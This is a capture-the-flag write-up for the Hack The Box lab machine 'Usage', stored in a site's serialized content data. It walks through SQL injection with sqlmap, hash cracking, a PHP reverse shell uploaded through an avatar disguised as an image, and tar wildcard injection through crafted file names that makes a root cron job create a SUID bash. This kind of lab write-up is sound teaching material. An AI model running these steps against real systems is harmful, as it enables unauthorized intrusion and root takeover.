[{"data":1,"prerenderedAt":579},["ShallowReactive",2],{"search":3,"recent-machines":28,"machine-\u002Fmachines\u002Fhtb-usage":35},[4,8,12,16,20,24],{"_path":5,"title":6,"image":7},"\u002Fmachines\u002Fhtb-boardlight","BoardLight","\u002Fimg\u002Fmachines\u002Fhtb-boardlight\u002Fcover.png",{"_path":9,"title":10,"image":11},"\u002Fmachines\u002Fhtb-headless","Headless","\u002Fimg\u002Fmachines\u002Fhtb-headless\u002Fcover.png",{"_path":13,"title":14,"image":15},"\u002Fmachines\u002Fhtb-usage","Usage","\u002Fimg\u002Fmachines\u002Fhtb-usage\u002Fcover.png",{"_path":17,"title":18,"image":19},"\u002Fmachines\u002Fthm-containment","ContAInment","\u002Fimg\u002Fmachines\u002Fthm-containment\u002Fcover.png",{"_path":21,"title":22,"image":23},"\u002Fprojects\u002Fmaddox","Maddox","\u002Fimg\u002Fprojects\u002Fmaddox\u002Fcover.png",{"_path":25,"title":26,"image":27},"\u002Fprojects\u002Fsentinel","Sentinel Password Manager","\u002Fimg\u002Fprojects\u002Fsentinel\u002Fcover.png",[29,31,33,34],{"_path":17,"title":18,"difficulty":30},"Medium",{"_path":13,"title":14,"difficulty":32},"Easy",{"_path":9,"title":10,"difficulty":32},{"_path":5,"title":6,"difficulty":32},{"_path":13,"_dir":36,"_draft":37,"_partial":37,"_locale":38,"title":14,"description":39,"difficulty":32,"platform":40,"os":41,"date":42,"image":15,"tags":43,"body":46,"_type":573,"_id":574,"_source":575,"_file":576,"_stem":577,"_extension":578},"machines",false,"","Easy Linux machine involving SQL Injection and password reset token exploitation.","HTB","Linux","2026-04-02",[40,41,32,44,45],"SQLi","Web",{"type":47,"children":48,"toc":567},"root",[49,58,64,114,119,145,151,172,177,183,196,230,243,277,290,303,328,340,360,366,386,415,436,502,515,551,561],{"type":50,"tag":51,"props":52,"children":54},"element","h2",{"id":53},"reconnaissance",[55],{"type":56,"value":57},"text","Reconnaissance",{"type":50,"tag":59,"props":60,"children":61},"p",{},[62],{"type":56,"value":63},"Starting with our initial Nmap scan:",{"type":50,"tag":65,"props":66,"children":70},"pre",{"className":67,"code":68,"language":69,"meta":38,"style":38},"language-bash shiki shiki-themes github-dark","nmap -sC -sV -oN nmap\u002Finitial 10.10.11.18\n","bash",[71],{"type":50,"tag":72,"props":73,"children":74},"code",{"__ignoreMap":38},[75],{"type":50,"tag":76,"props":77,"children":80},"span",{"class":78,"line":79},"line",1,[81,87,93,98,103,109],{"type":50,"tag":76,"props":82,"children":84},{"style":83},"--shiki-default:#B392F0",[85],{"type":56,"value":86},"nmap",{"type":50,"tag":76,"props":88,"children":90},{"style":89},"--shiki-default:#79B8FF",[91],{"type":56,"value":92}," -sC",{"type":50,"tag":76,"props":94,"children":95},{"style":89},[96],{"type":56,"value":97}," -sV",{"type":50,"tag":76,"props":99,"children":100},{"style":89},[101],{"type":56,"value":102}," -oN",{"type":50,"tag":76,"props":104,"children":106},{"style":105},"--shiki-default:#9ECBFF",[107],{"type":56,"value":108}," nmap\u002Finitial",{"type":50,"tag":76,"props":110,"children":111},{"style":89},[112],{"type":56,"value":113}," 10.10.11.18\n",{"type":50,"tag":59,"props":115,"children":116},{},[117],{"type":56,"value":118},"The scan reveals two open ports:",{"type":50,"tag":120,"props":121,"children":122},"ul",{},[123,135],{"type":50,"tag":124,"props":125,"children":126},"li",{},[127,133],{"type":50,"tag":128,"props":129,"children":130},"strong",{},[131],{"type":56,"value":132},"Port 22",{"type":56,"value":134}," — SSH",{"type":50,"tag":124,"props":136,"children":137},{},[138,143],{"type":50,"tag":128,"props":139,"children":140},{},[141],{"type":56,"value":142},"Port 80",{"type":56,"value":144}," — HTTP",{"type":50,"tag":51,"props":146,"children":148},{"id":147},"enumeration",[149],{"type":56,"value":150},"Enumeration",{"type":50,"tag":59,"props":152,"children":153},{},[154,156,162,164,170],{"type":56,"value":155},"We add ",{"type":50,"tag":72,"props":157,"children":159},{"className":158},[],[160],{"type":56,"value":161},"usage.htb",{"type":56,"value":163}," to our ",{"type":50,"tag":72,"props":165,"children":167},{"className":166},[],[168],{"type":56,"value":169},"\u002Fetc\u002Fhosts",{"type":56,"value":171}," file and browse to port 80, where we find a blog website with user registration and login functionality.",{"type":50,"tag":59,"props":173,"children":174},{},[175],{"type":56,"value":176},"Trying basic SQL injection payloads on the login page bypasses the authentication or results in an error. We realize the password reset function is vulnerable to SQL injection.",{"type":50,"tag":51,"props":178,"children":180},{"id":179},"foothold",[181],{"type":56,"value":182},"Foothold",{"type":50,"tag":59,"props":184,"children":185},{},[186,188,194],{"type":56,"value":187},"Using ",{"type":50,"tag":72,"props":189,"children":191},{"className":190},[],[192],{"type":56,"value":193},"sqlmap",{"type":56,"value":195}," on the password reset endpoint, we map out the database:",{"type":50,"tag":65,"props":197,"children":199},{"className":67,"code":198,"language":69,"meta":38,"style":38},"sqlmap -r request.txt --batch --dbs\n",[200],{"type":50,"tag":72,"props":201,"children":202},{"__ignoreMap":38},[203],{"type":50,"tag":76,"props":204,"children":205},{"class":78,"line":79},[206,210,215,220,225],{"type":50,"tag":76,"props":207,"children":208},{"style":83},[209],{"type":56,"value":193},{"type":50,"tag":76,"props":211,"children":212},{"style":89},[213],{"type":56,"value":214}," -r",{"type":50,"tag":76,"props":216,"children":217},{"style":105},[218],{"type":56,"value":219}," request.txt",{"type":50,"tag":76,"props":221,"children":222},{"style":89},[223],{"type":56,"value":224}," --batch",{"type":50,"tag":76,"props":226,"children":227},{"style":89},[228],{"type":56,"value":229}," --dbs\n",{"type":50,"tag":59,"props":231,"children":232},{},[233,235,241],{"type":56,"value":234},"The database contains user credentials, including an administrator hash. We crack the hash using ",{"type":50,"tag":72,"props":236,"children":238},{"className":237},[],[239],{"type":56,"value":240},"hashcat",{"type":56,"value":242},":",{"type":50,"tag":65,"props":244,"children":246},{"className":67,"code":245,"language":69,"meta":38,"style":38},"hashcat -m 3200 hash.txt rockyou.txt\n",[247],{"type":50,"tag":72,"props":248,"children":249},{"__ignoreMap":38},[250],{"type":50,"tag":76,"props":251,"children":252},{"class":78,"line":79},[253,257,262,267,272],{"type":50,"tag":76,"props":254,"children":255},{"style":83},[256],{"type":56,"value":240},{"type":50,"tag":76,"props":258,"children":259},{"style":89},[260],{"type":56,"value":261}," -m",{"type":50,"tag":76,"props":263,"children":264},{"style":89},[265],{"type":56,"value":266}," 3200",{"type":50,"tag":76,"props":268,"children":269},{"style":105},[270],{"type":56,"value":271}," hash.txt",{"type":50,"tag":76,"props":273,"children":274},{"style":105},[275],{"type":56,"value":276}," rockyou.txt\n",{"type":50,"tag":59,"props":278,"children":279},{},[280,282,288],{"type":56,"value":281},"Logging in as the admin, we find an option to upload an avatar. The file upload functionality has a bypass that permits uploading PHP files disguised as images (e.g., using a ",{"type":50,"tag":72,"props":283,"children":285},{"className":284},[],[286],{"type":56,"value":287},".php.jpg",{"type":56,"value":289}," extension and modifying the magic bytes).",{"type":50,"tag":59,"props":291,"children":292},{},[293,295,301],{"type":56,"value":294},"We upload a standard PHP reverse shell and trigger it by navigating to ",{"type":50,"tag":72,"props":296,"children":298},{"className":297},[],[299],{"type":56,"value":300},"\u002Fuploads\u002Fprofile.php",{"type":56,"value":302},".",{"type":50,"tag":65,"props":304,"children":306},{"className":67,"code":305,"language":69,"meta":38,"style":38},"nc -lvnp 4444\n",[307],{"type":50,"tag":72,"props":308,"children":309},{"__ignoreMap":38},[310],{"type":50,"tag":76,"props":311,"children":312},{"class":78,"line":79},[313,318,323],{"type":50,"tag":76,"props":314,"children":315},{"style":83},[316],{"type":56,"value":317},"nc",{"type":50,"tag":76,"props":319,"children":320},{"style":89},[321],{"type":56,"value":322}," -lvnp",{"type":50,"tag":76,"props":324,"children":325},{"style":89},[326],{"type":56,"value":327}," 4444\n",{"type":50,"tag":59,"props":329,"children":330},{},[331,333,339],{"type":56,"value":332},"We receive a shell as the user ",{"type":50,"tag":72,"props":334,"children":336},{"className":335},[],[337],{"type":56,"value":338},"dash",{"type":56,"value":302},{"type":50,"tag":65,"props":341,"children":343},{"className":67,"code":342,"language":69,"meta":38,"style":38},"cat \u002Fhome\u002Fdash\u002Fuser.txt\n",[344],{"type":50,"tag":72,"props":345,"children":346},{"__ignoreMap":38},[347],{"type":50,"tag":76,"props":348,"children":349},{"class":78,"line":79},[350,355],{"type":50,"tag":76,"props":351,"children":352},{"style":83},[353],{"type":56,"value":354},"cat",{"type":50,"tag":76,"props":356,"children":357},{"style":105},[358],{"type":56,"value":359}," \u002Fhome\u002Fdash\u002Fuser.txt\n",{"type":50,"tag":51,"props":361,"children":363},{"id":362},"privilege-escalation",[364],{"type":56,"value":365},"Privilege Escalation",{"type":50,"tag":59,"props":367,"children":368},{},[369,371,377,379,385],{"type":56,"value":370},"Enumerating the system, we check processes and cron jobs. We find an interesting backup script running periodically as root. The script uses the wildcard ",{"type":50,"tag":72,"props":372,"children":374},{"className":373},[],[375],{"type":56,"value":376},"*",{"type":56,"value":378}," to compress files in a directory using ",{"type":50,"tag":72,"props":380,"children":382},{"className":381},[],[383],{"type":56,"value":384},"tar",{"type":56,"value":302},{"type":50,"tag":65,"props":387,"children":389},{"className":67,"code":388,"language":69,"meta":38,"style":38},"cat \u002Fusr\u002Flocal\u002Fbin\u002Fbackup.sh\n# tar -czf \u002Fvar\u002Fbackups\u002Fbackup.tar.gz *\n",[390],{"type":50,"tag":72,"props":391,"children":392},{"__ignoreMap":38},[393,405],{"type":50,"tag":76,"props":394,"children":395},{"class":78,"line":79},[396,400],{"type":50,"tag":76,"props":397,"children":398},{"style":83},[399],{"type":56,"value":354},{"type":50,"tag":76,"props":401,"children":402},{"style":105},[403],{"type":56,"value":404}," \u002Fusr\u002Flocal\u002Fbin\u002Fbackup.sh\n",{"type":50,"tag":76,"props":406,"children":408},{"class":78,"line":407},2,[409],{"type":50,"tag":76,"props":410,"children":412},{"style":411},"--shiki-default:#6A737D",[413],{"type":56,"value":414},"# tar -czf \u002Fvar\u002Fbackups\u002Fbackup.tar.gz *\n",{"type":50,"tag":59,"props":416,"children":417},{},[418,420,426,428,434],{"type":56,"value":419},"This is vulnerable to a classic wildcard injection. We create two files named ",{"type":50,"tag":72,"props":421,"children":423},{"className":422},[],[424],{"type":56,"value":425},"--checkpoint=1",{"type":56,"value":427}," and ",{"type":50,"tag":72,"props":429,"children":431},{"className":430},[],[432],{"type":56,"value":433},"--checkpoint-action=exec=sh exploit.sh",{"type":56,"value":435}," in the directory being backed up.",{"type":50,"tag":65,"props":437,"children":439},{"className":67,"code":438,"language":69,"meta":38,"style":38},"echo \"cp \u002Fbin\u002Fbash \u002Ftmp\u002Fbash; chmod +s \u002Ftmp\u002Fbash\" > exploit.sh\ntouch -- \"--checkpoint=1\"\ntouch -- \"--checkpoint-action=exec=sh exploit.sh\"\n",[440],{"type":50,"tag":72,"props":441,"children":442},{"__ignoreMap":38},[443,467,485],{"type":50,"tag":76,"props":444,"children":445},{"class":78,"line":79},[446,451,456,462],{"type":50,"tag":76,"props":447,"children":448},{"style":89},[449],{"type":56,"value":450},"echo",{"type":50,"tag":76,"props":452,"children":453},{"style":105},[454],{"type":56,"value":455}," \"cp \u002Fbin\u002Fbash \u002Ftmp\u002Fbash; chmod +s \u002Ftmp\u002Fbash\"",{"type":50,"tag":76,"props":457,"children":459},{"style":458},"--shiki-default:#F97583",[460],{"type":56,"value":461}," >",{"type":50,"tag":76,"props":463,"children":464},{"style":105},[465],{"type":56,"value":466}," exploit.sh\n",{"type":50,"tag":76,"props":468,"children":469},{"class":78,"line":407},[470,475,480],{"type":50,"tag":76,"props":471,"children":472},{"style":83},[473],{"type":56,"value":474},"touch",{"type":50,"tag":76,"props":476,"children":477},{"style":89},[478],{"type":56,"value":479}," --",{"type":50,"tag":76,"props":481,"children":482},{"style":105},[483],{"type":56,"value":484}," \"--checkpoint=1\"\n",{"type":50,"tag":76,"props":486,"children":488},{"class":78,"line":487},3,[489,493,497],{"type":50,"tag":76,"props":490,"children":491},{"style":83},[492],{"type":56,"value":474},{"type":50,"tag":76,"props":494,"children":495},{"style":89},[496],{"type":56,"value":479},{"type":50,"tag":76,"props":498,"children":499},{"style":105},[500],{"type":56,"value":501}," \"--checkpoint-action=exec=sh exploit.sh\"\n",{"type":50,"tag":59,"props":503,"children":504},{},[505,507,513],{"type":56,"value":506},"Once the cron job executes, it runs our ",{"type":50,"tag":72,"props":508,"children":510},{"className":509},[],[511],{"type":56,"value":512},"exploit.sh",{"type":56,"value":514}," script with root privileges, giving SUID permissions to our copy of bash.",{"type":50,"tag":65,"props":516,"children":518},{"className":67,"code":517,"language":69,"meta":38,"style":38},"\u002Ftmp\u002Fbash -p\nwhoami\n# root\n",[519],{"type":50,"tag":72,"props":520,"children":521},{"__ignoreMap":38},[522,535,543],{"type":50,"tag":76,"props":523,"children":524},{"class":78,"line":79},[525,530],{"type":50,"tag":76,"props":526,"children":527},{"style":83},[528],{"type":56,"value":529},"\u002Ftmp\u002Fbash",{"type":50,"tag":76,"props":531,"children":532},{"style":89},[533],{"type":56,"value":534}," -p\n",{"type":50,"tag":76,"props":536,"children":537},{"class":78,"line":407},[538],{"type":50,"tag":76,"props":539,"children":540},{"style":83},[541],{"type":56,"value":542},"whoami\n",{"type":50,"tag":76,"props":544,"children":545},{"class":78,"line":487},[546],{"type":50,"tag":76,"props":547,"children":548},{"style":411},[549],{"type":56,"value":550},"# root\n",{"type":50,"tag":59,"props":552,"children":553},{},[554,559],{"type":50,"tag":128,"props":555,"children":556},{},[557],{"type":56,"value":558},"Root flag captured!",{"type":56,"value":560}," 🏴",{"type":50,"tag":562,"props":563,"children":564},"style",{},[565],{"type":56,"value":566},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":38,"searchDepth":407,"depth":407,"links":568},[569,570,571,572],{"id":53,"depth":407,"text":57},{"id":147,"depth":407,"text":150},{"id":179,"depth":407,"text":182},{"id":362,"depth":407,"text":365},"markdown","content:machines:htb-usage.md","content","machines\u002Fhtb-usage.md","machines\u002Fhtb-usage","md",1777047342074]